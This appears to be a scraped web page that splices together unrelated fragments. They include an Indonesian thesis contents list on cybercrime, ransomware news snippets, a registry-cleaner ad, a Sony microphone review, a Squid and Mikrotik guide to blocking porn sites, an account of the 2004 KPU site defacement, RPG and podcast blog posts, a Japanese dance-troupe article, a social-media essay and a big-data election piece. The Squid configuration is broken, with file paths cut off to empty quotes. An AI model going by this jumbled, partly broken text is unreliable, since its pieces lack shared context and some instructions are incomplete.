C. Pengertian dan Unsur Tidak Pidana.   .................   41
D. Pengolongan Tindak Pidana...................................51
E. Grafik Cyber Crime Tahun 2013........................... 65
F Dampak Pencemaran Nama Baik……….............   70
G. Aturan Hukum Pencmaran Nama Baik Di Jaringan
     Sosial …………………………………………… 72
H. Langkah Bagus Jika Nama Baik Di Cemarkan Di
     Dunia Maya ……………………………………74
I .  Contoh Kasus ………………………………… 78
BAB III     Penutup
1. Kesimpulan Dan Saran………………………... 96
2. Daftar pustaka   ................................................   99
3. Daftar Riwat Hidup ………………………….. 104

Cybereason RansomFree + Portable

Cybereason RansomFree - инструмент для защиты компьютеров Windows, сетевых и общих дисков от троянов-шифровальщиков (включая WannaCry, а также Locky, Cryptowall, TeslaCrypt, Jigsaw и Cerber). Утилита, для обнаружения вредоносов, использует поведенческий анализ и не требует обновления сигнатур.
          Petya cyber security attack: What you need to know   

A new strain of ransomware, known as ‘Petya’, has impacted individuals, private companies and public organisations including banks, airports and government organisations across Europe over the last 24 hours.

          Diverse team leads $12.23 million cyber security project   

Meena Mungro is from Mauritius, an island in the Indian Ocean. She represents one of 17 nationalities in the Cyber Security Researchers of Waikato (CROW team at the University of Waikato.

          Ryan Ko's top five cyber safety tips   

Unique malware is being created every half second, so there’s no better time than the present to up your cyber security game, according to University of Waikato Associate Professor Ryan Ko.

          Virtual cyber defender one of the first in NZ   

A fledgling, cutting-edge cyber security Wellington company has launched a virtual chief information security officer (vCISO) service aimed at helping New Zealand businesses to respond as cyber-crime begins to bite.

          Cyber security a growing concern for NZ IT leaders   

According to the 2017 Digital Readiness report, Building strong digital foundations, New Zealand IT leaders see digital as posing a significant risk to their organisations and getting cyber-security right, as part of a broader quality assurance strategy, is the key to building a successful digita

          Wise Registry Cleaner Professional   
Wise Registry Cleaner speeds up your PC by cleaning your Registry.The older your PC is, the more junked-up its Registry becomes. Badly written programs (and there are plenty of those around) don't bother to clean the Registry when you uninstall them, and some programs add unnecessary junk to the Registry. The more junked-up your Registry, the more likely it is to crash or to slow down your PC. This software does a great job of identifying and cleaning out the Registry junk. It scans the Registry, flagging orphaned or bad Registry entries, and shows you the name and values for each. It identifies Registry entries that may be dangerous to delete, and those that are safe to delete, so you can distinguish between the two. It also lets you decide which entries to delete, and which to keep. For safety's sake, it can also back up your Registry before a scan, so that you can restore it, if the program causes any problems. Wise Registry Cleaner is one of the safest Registry cleaning tools available on the market today. Its scanning engine is thorough, safe and fast. Wise Registry Cleaner improves your PC's performance by optimizing your system (This feature is only included in Professional Edition). Tag:windows xp professional tune up cc cleaner pc cleaner microsoft registry cleaner voip wise registry mechanic keygen cyberdefender registry cleaner
          The Cyber Attacks Are Going to Get Worse, But You Can Beat Them   
For the second time in a month, a global ransomware attack was unleashed affecting multiple major targets, including two in the United States. It's just the start.
          Here's 6 Steps You Need to Take if You're Hit With Petya (or Other Types of Ransomware)   
The Petya cyberattack has spread to 65 countries and has shuttered businesses. Here's what you should do if your company gets infected
          Sony UWP-D11/K33 Wireless Microphone   
Sony UWP-D11/K33 Wireless Microphone

Sony UWP-D11/K33 Wireless Microphone

less MicrophoneDigital Audio Processing for high quality sound for ENG / EFP productionsThe UWP-D11 belt-pack wireless microphone package offers the sound quality of digital audio processing combined with the reliability of analogue FM modulation. The package includes the UTX-B03 belt-pack transmitter and URX-P03 portable receiver. Also included is a high quality omni-directional lavalier microphone and a range of accessories including windscreen, microphone holder clip, belt-clip and shoe-mount adaptor.The UWP-D11 package offers wide frequency coverage with up to 72 MHz bandwidth (depending on region) across a wide range of channels, with a choice of models to choose from. Easy-to-use features include a large display and small size receiver to fit neatly on any size camcorder or DSLR camera, automatic channel setting function, headphone output, USB connection for power supply and line input availability. The UWP-D Series system provides superb transient response performance for all ENG / EFP production applications.Digital Audio Processing for high quality soundImproves transient response performance between the UWP-D transmitter and receiver, which will provide impressive natural sound quality compared to conventional analogue wireless systems.Complete packageThe UWP-D11 comes as a complete package including the UTX-B03 belt-pack transmitter, URX-P03 portable receiver, omni-directional lavalier microphone and everything you need to operate the wireless audio system.Wide frequency coverage with choice of channels availableThe extra wide switching bandwidth covers a wide area, with a wide choice of channels available across multiple models - please refer to product specifications for more information.Large display and small size receiverThe transmitter and receiver both feature a large display for ease of use, while the small size receiver fits neatly on any size camcorder or DSLR camera.Easy to use featuresAutomatic channel setting function, headphone output, USB connection for power supply and line input availability.UWP-D wireless microphones pick up Best of Show awards at IBCSony’s UWP-D wireless microphone series has scooped two accolades at this year’s IBC show. This light, compact wireless solution partners superb sound quality with smart features for versatile operation in the field. With the SMAD-P3 Multi Interface Shoe adaptor, you can enjoy cable-free connection between the wireless receiver and a range of Sony cameras and camcorders.After its successful debut at IBC 2014, Sony’s UWP-D wireless microphone family has been featured in the ‘Best of Show’ Award winners by leading European broadcast/media publications TVBEurope and Audio Media.The ‘Best of Show’ Awards recognise outstanding products exhibited at the 2014 International Broadcasting Convention in Amsterdam. Winners were selected by panels of professional users and editors attending the show.UWP-D Series wireless microphones team exceptionally reliable, stable signal transmission with the purity of Digital Sound Processing (DSP) for crystal-clear sound when you’re in the field. Quick and easy to set-up and adjust when you’re under pressure, UWP-D offers the extra attractions of long battery life in a tough, compact design that’s ideal for busy freelancers and solo camera operators.Adding the SMAD-P3 shoe adaptor* allows audio signals to be transmitted directly from the URX-PO3 portable receiver to the camera with no XLR connecting cables. The adaptor connects the receiver securely to the Multi Interface (MI) terminal that features on several XDCAM camcorders, as well as Sony interchangeable lens cameras and pro-focused Handycam models.As well as eliminating extra wires, the receiver draws power from the camera itself that also controls power ON/OFF. It’s a neat, integrated, highly practical audio solution for ENG, field production and DSLR-based film-makers alike.* The SMAD-P3 MI shoe adaptor is compatible with PXW-X180/PXW-X160 portable XDCAM camcorders, α7/ α7R/ α7S/ α99 interchangeable lens digital cameras, Handycam NEX-VG900/NEX-VG30 camcorders and the Cyber-shot DSC-RX10 (as of July 2014).Alister Chapman reviews the Sony UWP-D Digital Audio Processing Radio Mics:DoP and Cinematographer Alister Chapman shares his experience using the new UWP-D range of radio mics and how the clever new features combine together into an even smaller and neater package, giving improved dynamic range and natural sounding audio, even in remote locations.Choosing the right microphone for the job -For many years I have been happily using Sony’s previous generation UWP-V series radio microphones. These radio mics served me very well, getting carted all over the world from the Arizona Desert to Arctic Norway. They never let me down.So really I was in no rush to replace them. However when I was shown some of the neat features of the new UWP-D range of radio mics, I decided to get the UWP-D11 kit. This comprises a belt pack transmitter with a lavalier microphone, and a belt pack receiver that comes with belt clips and a camera mounting bracket.As a cameraman, I find microphones a pretty boring subject. But you know what? Audio is just as important as your pictures – some would say more important. Poor quality sound can really ruin an otherwise decent shot. Choosing the right microphone for the job is important: better still, bring in a sound recordist to look after the sound while you concentrate 100% on the pictures. Sadly however the reality on many of the shoots I’m involved with is that there isn’t the budget for a ‘soundie’. Nor is there the time or space to set up mic stands and fish poles with gun mics. What’s needed is something simple, quick and easy. This is where the ubiquitous radio mic comes into play.No more cables to snag!Being able to power the mic from the camera is hugely beneficial on longer shoots or in remote locations.You can clip a lavalier (tie clip) mic on to your subject quickly and easily. There are no cables to snag, and if you want you can do walking/talking shots. I think most camera crews will own at least one radio mic kit.But radio mics are traditionally a compromise. For years they have used old-fashioned FM radio to send the signal to the receiver… and this has a limited dynamic range and can be prone to noise and hiss. If your budget is big enough you can get around this with a pure digital radio mic system like Sony’s excellent DWX series. The DWX microphones use digital transmission to eliminate hiss. But much as I’d love a DWX system, for the type of work I do they are overkill.So I wasn’t sure about the UWP-D concept – a hybrid digital mic that uses digital processing combined with traditional FM transmission. That is until I got to play with one.Compact without sacrificing build qualityThe first thing I noticed was the size. The UWP-D series is quite a bit smaller than previous generations without sacrificing build quality. They are made from rugged aluminium alloy. The next obvious thing is the size of the LCD display, it’s much larger, clearer and easier to read. It has a backlight on a timer so it’s easy to see even if you’re working in the dark. The other external differences are a little less obvious, but just as important.On the bottom of the belt pack receiver there is a special new docking port that can be used to dock the microphone to an adapter for use with many of Sony’s video cameras. The docking port connects the receiver to a cradle. This then plugs in to the MI (Multi-Interface) Shoe that’s now present on a very wide range of Sony cameras, from the A7 DSLR’s to the consumer AX100 and the new XDCAM PXW series. When you use this cradle the mic is powered by the camera, and the audio passes directly to the camera via the adapter. No more cables to snag! Being able to power the mic from the camera is hugely beneficial on longer shoots or in remote locations. If your camera doesn’t have an MI shoe then all is not lost, as next to the special docking port there is also a micro USB socket. You can use this socket to power the radio mic from almost any standard USB type power supply such as a phone charger. Many cameras have powered USB ports on them – or you can get D-Tap to USB adapters. So there are lots of ways to power these mics. The belt pack transmitter is the same: it too has a micro USB port that can be used to charge the mic’s batteries if you use NiMH rechargeables.While I’m talking about the transmitter, it’s worth noting that this can be switched between mic and line level inputs. So if you need to take a remote feed from an audio desk you shouldn’t have any audio level issues – as can often be the case with transmitters that only accept mic level.Clever features – A true diversity receiver that prevents audio dropoutsBack to the receiver. It’s a true diversity receiver with two antennas. Now, many radio mics have two antennas, but this one actually has two independent receiver sections. The unit automatically switches extremely rapidly to the receiver that’s getting the best signal. This prevents those annoying momentary audio dropouts that can occur in buildings due to signal reflections and other interference. On the top of the receiver there’s a locking 3.5mm jack for the main balanced output, and next to that is a secondary headphone output that could also be used to feed a second camera if needed.The UWP-D radio mics have some clever features. The most useful to me is the ability to have the receiver scan for a clear and unused channel. Once it has found a clear channel it can set the frequency of the transmitter to match the receiver via infrared. This takes just moments to do, and is so much easier than messing around trying to manually enter channel numbers or frequencies. Once your frequency’s set, you can if you wish set the transmitter to a low power setting to make the batteries last longer. Although I do find that a set of good quality AA batteries will reliably give me a solid, non-stop half day’s use anyway.Improved dynamic range resulting in natural soundSo what about the ‘D’ bit in the UWP-D name? To get decent quality sound from an FM radio mic the audio from the transmitter is compressed, making it possible to transmit a wide dynamic range over a single FM channel. Then in the receiver the audio is expanded to restore a natural sound range. This process is called a ‘compander’ (Compression Expander). Traditional systems do this with basic analogue circuits, but in the UWP-D series the compander is digital. This results in improved dynamic range, allowing the mic to better handle transient sounds like claps, clicks and pops. The audio just sounds more natural. I also find that I have less hiss from these mics than my previous ones.On the surface the UWP-D may only seem like a small upgrade over the previous UWP-V series. But the improvements are many, and when combined together into this even smaller and neater package it makes them a worthwhile upgrade. Having used them for a little while now, I find them much more convenient and the audio really does sound better. I’m really pleased with them.

          An Invisible Curtain Falls Between Russia and the West   
Is the Cold War truly over, or has the front line simply moved from battlespace to cyberspace?
          untuk menangkal situs porno   

Untuk menangkal situs porno tidaklah sukar. Secara umum ada dua (2) teknik menangkal situs porno, yaitu:
• Memasang filter di PC pengguna.
• Memasang filter di server yang tersambung ke Internet.

Teknik yang pertama, memasang filter pada PC pengguna, biasanya dilakukan oleh para orang tua di PC di rumah agar anak-anak tidak melakukan surfing ke situs yang tidak di inginkan. Daftar lengkap filter maupun browser yang cocok untuk anak untuk aplikasi rumah tersebut dapat dilihat pada ? parent’s guide ? browser’s for kids. ? parent’s guide ? blocking and filtering.

Beberapa filter yang cukup terkenal seperti
Net Nanny,
I Way Patrol,

Tentunya teknik memfilter seperti ini hanya dapat dilakukan bagi orang tua di rumah kepada anak-nya yang belum begitu tahu Internet.Bagi sekolah yang terdapat fasilitas internet, tentunya teknik-teknik di atas sulit di terapkan. Cara paling effisien untuk menangkal situs porno adalah dengan memasang filter pada server proxy yang digunakan di WARNET / di kantor yang digunakan mengakses Internet secara bersama-sama dari sebuah Local Area Network (LAN).Teknik ke dua (2), memasang filter situs porno tidaklah sukar. Beberapa software komersial untuk melakukan filter konten, antara lain adalah:

Mungkin yang justru paling sukar adalah memperoleh daftar lengkap situs-situs yang perlu di blokir. Daftar tersebut diperlukan agar filter tahu situs mana saja yang perlu di blokir. Daftar ratusan ribu situs yang perlu di blokir dapat di ambil secara gratis, antara lain di:

bagi sekolah atu perkantoran, alternatif open source (Linux) mungkin menjadi menarik karena tidak membajak software. Pada Linux, salah satu software proxy yang paling populer adalah squid ( yang biasanya dapat di install sekaligus bersamaan dengan instalasi Linux (baik Mandrake maupun RedHat).

Untuk melakukan proses filtering pada squid tidaklah sukar, kita cukup menambahkan beberapa kalimat pada file /etc/squid/squid.conf. Misalnya

acl sex url_regex "/etc/squid/sex"
acl notsex url_regex "/etc/squid/notsex"
http_access allow notsex
http_access deny sex

buatlah file /etc/squid/sex

contoh isi /etc/squid/notsex:

contoh isi /etc/squid/sex:

untuk memasukan daftar blacklist yang di peroleh dari squidguard dll, dapat dimasukan dengan mudah ke daftar di atas tampak di bawah ini adalah daftar Access Control List (ACL) di /etc/squid/squid.conf yang telah saya buat di server saya di rumah, yaitu:

acl sex url_regex "
acl notsex url_regex "
acl aggressive url_regex "
acl drugs url_regex "
acl porn url_regex "
acl ads url_regex "
acl audio-video url_regex "
acl gambling url_regex "
acl warez url_regex "
acl adult url_regex "
acl dom_adult dstdomain "
acl dom_aggressive dstdomain "
acl dom_drugs dstdomain "
acl dom_porn dstdomain "
acl dom_violence dstdomain "
acl dom_ads dstdomain "
acl dom_audio-video dstdomain "
acl dom_gambling dstdomain "
acl dom_proxy dstdomain "
acl dom_warez dstdomain "

http_access deny sex
http_access deny adult
http_access deny aggressive
http_access deny drugs
http_access deny porn
http_access deny ads
http_access deny audio-video
http_access deny gambling
http_access deny warezhttp_access deny dom_adult
http_access deny dom_aggressive
http_access deny dom_drugs
http_access deny dom_porn
http_access deny dom_violence
http_access deny dom_ads
http_access deny dom_audio-video
http_access deny dom_gambling
http_access deny dom_proxy
http_access deny dom_warez

Dengan cara di atas, saya tidak hanya memblokir situs porno tapi juga situs yang berkaitan dengan drug, kekerasan, perjudian dll. Semua data ada pada file blacklist dari

Block Situs di Mikrotik Lewat Winbox

1.Buka winbox yang berada pada desktop.

2. Klik tando ( … ) atau isi alamat Mikrotik pada kolom Connect To:

3. Maka akan muncul gambar seperti di bawah ini, kemudian pilih salah satu.

4. Setelah itu isi Username dan Passwort Mikrotik

5. Kemudian klik tanda connect.

6. Dan akan terbuka jendela Mikrotik seoerti gambar di bawah ini.

7. Untuk block situs klik menu IP pilih Web Proxy

8. Kemudian Setting Web Proxy dengan mengeklik tombol Setting.

9. Maka akan muncul jendela seperti gambar di bawah ini.
Setting Web Proxy sepeti gambar di bawah ini, kemudian di klik tombol OK.

10. Sekarang kita mulai buat settingan website yang akan di block.Klik tanda ( + )
Maka akan muncul jendela, dan kemudia setting seperti gambar di bawah ini.

11. Kemudian klik OK, maka akan muncul catatan pada jendela Web Proxy.

12. Coba cek settingan tersebut dengan mengetikan kata “porno” pada google.

13. Dan kemudian enter, jika muncul tampilan seperti gambar di bawah ini maka settingan block situs Kamu berhasil.
Diposkan oleh Diandra Ariesalva Blogs di 10:39 0 komentar

Kejahatan dunia maya (Inggris: cybercrime) adalah istilah yang mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer menjadi alat, sasaran atau tempat terjadinya kejahatan. Termasuk ke dalam kejahatan dunia maya antara lain adalah penipuan lelang secara online, pemalsuan cek, penipuan kartu kredit/carding, confidence fraud, penipuan identitas, pornografi anak, dll.

Walaupun kejahatan dunia maya atau cybercrime umumnya mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer sebagai unsur utamanya, istilah ini juga digunakan untuk kegiatan kejahatan tradisional di mana komputer atau jaringan komputer digunakan untuk mempermudah atau memungkinkan kejahatan itu terjadi.

Contoh kejahatan dunia maya di mana komputer sebagai alat adalah spamming dan kejahatan terhadap hak cipta dan kekayaan intelektual. Contoh kejahatan dunia maya di mana komputer sebagai sasarannya adalah akses ilegal (mengelabui kontrol akses), malware dan serangan DoS. Contoh kejahatan dunia maya di mana komputer sebagai tempatnya adalah penipuan identitas. Sedangkan contoh kejahatan tradisional dengan komputer sebagai alatnya adalah pornografi anak dan judi online.

Pada pemilu 2004 lalu, ada sebuah kasus yang cukup mengegerkan dan memukul telak KPU sebagai institusi penyelenggara Pemilu. Tepatnya pada 17 April 2004 situs KPU diacak-acak oleh seseorang dimana nama-nama partai peserta pemilu diganti menjadi lucu-lucu namun data perolehan suara tidak dirubah. Pelaku pembobolan situs KPU ini dilakukan oleh seorang pemuda berumur 25 tahun bernama Dani Firmansyah, seorang mahasiswa Universitas Muhammadiyah Yogyakarta jurusan Hubungan Internasional.

Pihak Kepolisian pada awalnya kesulitan untuk melacak keberadaan pelaku terlebih kasus seperti ini adalah barang baru bagi Kepolisian. Pada awal penyelidikan Polisi sempat terkecoh karena pelaku membelokan alamat internet atau internet protocol (IP address) ke Thailand namun dengan usaha yang gigih, polisi berhasil meringkus tersangka ini setelah bekerjasama dengan beberapa pihak seperti Asosiasi Penyelenggara jasa Internet Indonesia (APJII) dan pihak penyedia jasa koneksi internet (ISP/Internet Service Provider).

Belakangan diketahui motif tersangka adalah untuk menunjukkan bahwa kinerja KPU sangat buruk terutama di bidang Teknologi Informasi, namun itu tidak bisa dibenarkan dan pelaku tetap diproses sesuai hukum yang berlaku.

Scoble has lots of links about the MSN Toolbar. Sorry I missed all the MS and Google news yesterday. I slept 15 hours, went to coffee with a new friend, went to a movie with an old friend, and slept some more. This is part of the recovery process, I'm getting better. I wasn't sleeping well before, all the coughing kept me up. It's great that the blogosphere has so many facets, so if I can't get you the news on a given day because of illness, there are others to pick up the slack. This morning I feel even better. Giving a seminar shortly at Berkman and then having a lunch at WGBH to talk about podcasting, then another movie. Busy, but fun stuff.

This week we're talking Suicide Squad, The Untold History Of The United States and cyberpunk. Music for the show provided by Reed Love and OGRE.

          8 simple cyber security tips for small business owners   

While having a personal IT guru is out of reach for most of us, your data will thank you for following these simple security tips.

The post 8 simple cyber security tips for small business owners appeared first on Flying Solo.

          Waves Of Cyberpunk   

This week I review the Ghost In The Shell FPS First Assault Online, Lando talks about playing Overwatch, I talk about playing the board game Eldritch Horror, and the necessity of marketing. Music for the show provided by Reed Love.

          The Ozone Channel   

This week:

Child 44
Altered Carbon
Lone Wolf & Cub
Weapon X

Music for the show provided by Reed Love.

          Cyber War   

Today on the 5: Tyler Kokjohn posed the question of whether we are in the midst of a cyber war.

          HumanNews: In eigener Sache Nr 28   

Unterwegs in den Sozialen Medien

Berlin/Cyberspace ( - Letzte Woche bei uns auf Facebook und
          What Makes A Marriage Last?   

Yesterday I signed up on the dating website If you hadn’t heard of it before this week as the place married people go to cheat on their spouses, then you probably did this week after a cyber attack by some morally righteous online vigilantes hacked it’s website and exposed the its members. All 39 […]

The post What Makes A Marriage Last? appeared first on Margie Warrell.

          AOA encourages members to protect themselves against global cyberattacks   
Take steps for protection after May 12 “WannaCry” virus spreads to 150 countries.

This week:

Homicide: A Year On The Killing Streets
God's War
Duluth Trading

Music for the show provided by Reed Love.

          Slow Menaces   
(I turned on G+ linking, so we'll see how that works with this post)

Dr. Who is has a Cybermen story in the pipe, and I guess maybe Neil Gaiman is behind it or something. I honestly have no idea. It's not that I dislike Dr. Who, but I tend to be about  a year behind whatever current is. Just one of those things.

That said, I saw an image for the cybermen, and it's very nice and polished, with a few Iron Man notes, and it got me thinking about fast cybermen (in the same spirit as fast zombies).  For the unfamiliar, cybermen are a villain cut from the very Dr. Who cloth of "Very terrifying, unless you do something radical, like run away".

It's easy to joke about this (insert a Dalek/stairs reference here) but it gets a little interesting when you think about what drives it.  Basically, this is something that allows for protagonists to not be combat monsters - having enemies who can't practically be fought but can be escaped opens up a lot of leeway for character backgrounds. For a less violent show like Dr. Who, that's very important. Similarly, when a zombie story is really about a mismatched collection of normal folks, it's kind of silly to make them all ex military.  And in both cases, it promotes problem solving outside of combat.

Translated over to an RPG, this is pretty easy to model with high defense, low attack enemies. Build them in such a way that the best a fight can do is break even, and you disincentivize fighting.   Note, that this is very different from making high defense/High offense enemies - in that case, fighting is not only a bad plan, but it's also pretty lethal.  The trick with slow enemies is not that they'll kill you in a round, but rather that if you continue to engage them, it will sooner or later go against you.

Now, is this something that's actually desirable in a game?  Sure, at least sometimes.  Slow menaces are really just disguised pacing and tension engines.  Because they are relentless but escapable, they can be brought to bear any time things slow down without the risk of ending play.  They drive hard choices through their presence, because "not running away" is always a possible downside.[1]  If you think of the menace as a meter that slowly fills, it's easy to see the pacing laid bare.

That is, suppose the zombies have a 3 box meter.  When they show up, check the first box.  You can fight them, and if successful, the box doesn't fill any further, but if you fail (or if you are trying to do something else at the same time), the second box fills. Run the cycle again, and if box #3 is filled, then someone is grabbed and taken down, simple as that.[2]

Now, the advantage of abstracting that is that it suddenly becomes a great way to handle any threat that can be escaped, but not vanquished.  It would, for example, be a great model for being on the receiving end of a manhunt, but it can be more abstract than that too, especially if you substitute in something other than running away as the deferral mechanism. For example, if you eat, rather than run, then it's a model for starvation.

In a round about way, I think this may be coming back towards Skill Challenges and the way very old Fate handled long challenges.  Which mostly suggests I may need to dust off some of that thinking.

1 - Hell, if you ant to do a Talislanta/Apocalypse World hack, it's easy to add "the menace arrives" as an extra option to all success-with-consequences outcomes. 

2 - Yes, technically, that's an insta-kill, but note that that it can be *deferred* by fighting, so the badass can protect the technician's back while he plants the bomb or whatnot.  It changes the role of the fighting dude, but not necessarily in a bad way.

          The Cyberiad   

Today on the 5: I finally got around to reading The Cyberiad by Stanislaw Lem. My review.

          なんだこの多幸感……! いい匂いがしそうな美ボディお姉さんたちのお尻トレイン「CYBERJAPAN DANCERS」の中毒性   
 お・し・り! お・し・り!  思わずそう叫び出しながら、ご飯を食べたくなってしまうミュージックビデオが公開された。ビキニのお姉さんたちが、至近距離でお尻をぷるぷる。しかも1人や2人ではなく、数えきれないほどの美ボディ美尻がぷるぷるしているのだ(数えてみたら16人いました)。  28日にこのミュージックビデオを公開したのは、“セクシーでパワフルな美ボディダンサー集団”こと、「CYBERJAPAN DANCERS」。各メンバーのインスタフォロワーが計200万人を超え、2月に発売された初の写真集『CYBERJAPAN DANCERS 1st PHOTO BOOK』(宝島社)が2万部以上のセールスを上げた、話題のダンスグループだ。  動画は、まずメンバーたちのくびれのアップからスタート。そのほっそいお腹にほおずりしたくなっていると、軍用車に乗ったり寄りかかったりしながらポーズをとる16人のショットを挟んで、いよいよカメラがお尻に。南国の青空の下に並ぶお尻を眺めていると、単なるエロスとは違う健康的な多幸感が訪れてくる。
 さらに、オフショット風の映像ではメイク中の彼女たちのくちびるにフォーカス! こちらもぷるぷるで、いかにもいい匂いがしそうである。とにかく、いい匂いがしそうなのだ。  再びダンスシーンに戻ると、軽快なナンバーに乗せて、さらにお尻。往年のグレイシー一族を思わせるトレインフォーメーションからのトレインぷるぷるを舐めるように捕らえたショットには、単なるエロスではないヨダレが垂れてくる。  さらに後半ではビキニからチアに衣装チェンジ! 両手にポンポンを持って舞う姿は愛らしく、もちろんここでもカメラはお尻に寄っていく。どんだけお尻好きなんだカメラマン! そしてオレ!  聞けば、お笑い芸人・オードリーの若林正恭も「CYBERJAPAN DANCERS」のファンだそうで、夜な夜な映像をループしながらハイボールを飲んでいるそうだ。その気持ち、わかる、わかるぞ……。  というわけで、もう一杯ご飯食べてきますんで!
Summertime Forever(初回限定盤)(DVD付) 7月12日発売! amazon_associate_logo.jpg

          Dampak Positif dan Negatif dari Sosial Media (Sosmed)   

Kalau membahas soal teknologi dan internet, sudah pasti berhubungan dengan yang namanya sosial media (sosmed). Akhir-akhir ini sosial media berkembang sangat pesat. Dari tahun ke tahun, bermunculan berbagai jenis sosial media yang bisa digunakan untuk berinteraksi. Mulai sosial media yang hanya berbagi pesan dengan teks, hingga berbagi gambar atau video.

Dengan kecanggihan sosial media ini dapat mempermudah kehidupan manusia, sekaligus sebagai hiburan. Dengan sosial media, setiap saat kita dapat berinteraksi dan berbagi momen kepada teman-teman atau khalayak publik. Namun dari majunya sosial media ini, selain memberi dampak positif juga memberi dampak negatif terhadap manusia. Apa saja dampak positif dan negatifnya? Langsung aja gue jelasin sebagai berikut:

1. Mendekatkan Orang-orang yang Jauh
Sosial media merupakan teknologi yang mampu orang berinteraksi kapanpun dan dimanapun mereka berada. Sehingga hal ini dapat mendekatkan orang-orang yang jauh dengan kita, karena dapat membantu interaksi dengan orang lain dengan jarak yang jauh.

2. Mendapatkan dan Menyebarkan Informasi dengan Mudah dan Cepat
Hanya dengan bantuan koneksi internet yang bisa didapatkan dengan mudah saat ini. Mengakses sosial media menjadi yang mudah dilakukan. Dengan itu, mendapatkan atau membagikan informasi melalui sosial media dapat dilakukan dengan mudah dan cepat.

3. Dapat Berbagi Cerita atau Momen Kepada Khalayak Publik
Dengan adanya sosial media, pengalaman atau cerita kita bisa disampaikan atau diketahui oleh khalayak publik. Hal ini pun membantu orang-orang untuk saling bertukar informasi, cerita dan pengalaman mereka.

4. Bisa Digunakan Sebagai Peluang Usaha
Jumlah pengguna sosial media mencakup seluruh orang di dunia. Ini merupakan sebuah peluang yang bisa digunakan untuk berusaha atau berbisnis. Seperti contohnya berjualan dan mempromosikan produk atau jasa.

1. Menjauhkan Orang-orang yang Dekat
Tanpa disadari, sosial media yang mampu mendekatkan orang yang jauh, justru membuat kita lupa akan orang-orang di sekitar kita. Kita terlalu fokus dengan gadget dan menggunakan sosial media, orang-orang di sekitar kita jadi gak dihiraukan. Hasilnya, sosial media justru menjauhkan orang yang dekat.

2. Menimbulkan Sifat Individualistis dan Candu
Bermain sosial media dapat menyebabkan ketergantungan (candu). Ini dapat menyebabkan orang gak bisa lepas dari gadgetnya. Akibatnya, di rumah pun juga akan terus sibuk bermain sosial media. Di rumah jadinya suka mengurung diri di kamar sambil "berinteraksi" melalui sosial media.

3. Menjadi Ajang Untuk Pamer
Kemampuan sosial media yang bisa mempublikasikan informasi melalui teks, foto atau video justru lama kelamaan digunakan untuk memamerkan kehidupannya. Memang gak ada yang salahnya sih memamerkan gaya hidup yang mesra, hedonis atau borjuis. Cuman sosial media itu dilihat oleh banyak orang, jadi jangan sampai membuat orang-orang menjadi risih.

4. Disalah Gunakan Untuk Hal-hal yang Tidak Baik
Berinteraksi menggunakan sosial media yang seharusnya digunakan untuk hal yang baik, sebaliknya banyak juga yang menggunakan untuk hal yang gak baik. Seperti contohnya dalam kasus cyber bullying (mengejek atau menghina) dan cyber crime (penipuan).

5. Membuat Orang Menjadi Haus Akan Perhatian (Eksis Berlebihan)
Sosial media identik dengan khalayak publik, hal tersebut membuat banyak orang yang bermain sosial media berlomba-lomba untuk menjadi eksis. Hanya saja, sifat yang haus akan perhatian ini bisa menjadi menyimpang dimana orang-orang tersebut rela melakukan hal-hal yang aneh atau gak baik hanya demi sebatas eksis.

6. Membuat Hidup Terasa Sepi
Kehadiran sosial media memang membuat hidup terasa ramai, di dunia maya saja. Tapi, kenyataannya di dunia nyata kemungkinan malah sebaliknya.

7. Menjadi Kurang Bersyukur
Melihat kehidupan orang lain di sosial media, dapat membuat diri kita membanding-bandingkan diri dengan orang lain. Sehingga ini dapat membuat kita susah bahagia dengan apa yang sudah dimiliki.

8. Informasi Pribadi Mudah Diketahui
Menggunakan sosial media otomatis secara sengaja atau gak, kita memberikan informasi pribadi kita ke publik. Ini sebenarnya dapat membahayakan diri, jika informasi tersebut dilihat oleh orang yang berniat gak baik.

9. Munculnya Keyboard Warrior
Saat berkomunikasi lewat sosial media, kita berada di posisi yang aman, karena gak berhadapan langsung dengan lawan bicara atau publik. Hal ini membuat orang menjadi lebih berani berekspresi dalam komunikasi lewat sosial media. Kadang terlalu berani berekspresi sampai berani menghina atau menghujat, biasanya dengan teks yang CAPSLOCK. Padahal di dunia nyata belum tentu seberani di dunia maya. Orang-orang yang agresif di dunia maya ini sering disebut keyboard warrior

10. Boros Uang
Sosial media memerlukan internet, internet memerlukan kuota, kuota perlu uang buat dibeli. Apalagi harga kuota internet itu mahal. Jadi, terlalu sering menggunakan sosial media itu boros.

Sebagai pengguna teknologi yang canggih dan smart, kita juga harus lebih maju dan smart! 
          HydraCrypt Ransomware   
HydraCrypt Ransomware är en allvarlig infektion som har skapats i ett enda syfte – att kräva pengar av användare. Cyberbrottslingar vet att det inte är enkelt att pressa någon på pengar, så de...
           Big Data : In Election And In Business Creates Big Impact   

The US Election results and the process have created worldwide impact. Not only it was noticed for electing someone for arguably the most powerful office in the world, it brings along with it many innovations and advances. In 2008, when Mr. Obama won the elections for the first time, it was very clear that technology played a substantial role in his assuming office. We saw in 2008, that online world was leveraged in a big way in the campaigns for a very successful outcome,. In the just concluded 2012 election, clearly data, data insights and data centric predictions played a very big role in shaping the election outcome. Lot of deserved kudos went in the direction of Nate Silver for his super accurate predictions of the election results based on data insights. Many people looked at it from different perspectives. Media industry focused on how works like this will in an of itself influence the media coverage of elections and assessment of preference trends in election. Nate is the author of Amazon best-selling book, “The Signal and the Noise: The Art and Science of Prediction“. In the days leading up to the election, he was on every major media show, explaining how a detailed analysis of huge amounts of data, distilled from many different sources, enabled him and his team to predict with a fair degree of confidence and certainty what would happen district by district in the US elections (It’s actually a great reward to see this appearance of Nate Silver, on Stephen Colbert’s story show, reported by the LA Times). Very clearly, he was accurate to the last level of detail, in an election when the swings were noticed by both and in the days close to the election, the “momentum vote ” of the challenger was supposed to be mucking the trends.

A lovely article by John McDermott at AdAge brings out that Silver’s work will help transform the shift the “touch and feel aspects” of reporting to reporting that is anchored in data - facts & statistics. The article quotes ComScore’s Online traffic analyst Andrew Lipsman as saying , “Now that people have seen [data analysis centered political analysis] proven over a couple of cycles, people will be more grounded in the numbers.” Chatter in the online world quoting Bloomberg as the source suggested that , Barack Obama’s site was placing 87 tracking cookies on people’s computers who access the site. Mitt Romney’s site was placing 48 tracking cookies on people’s compute. Tarun Wadhwa reports at Forbes that the power of big data has finally been realized in the US political process:

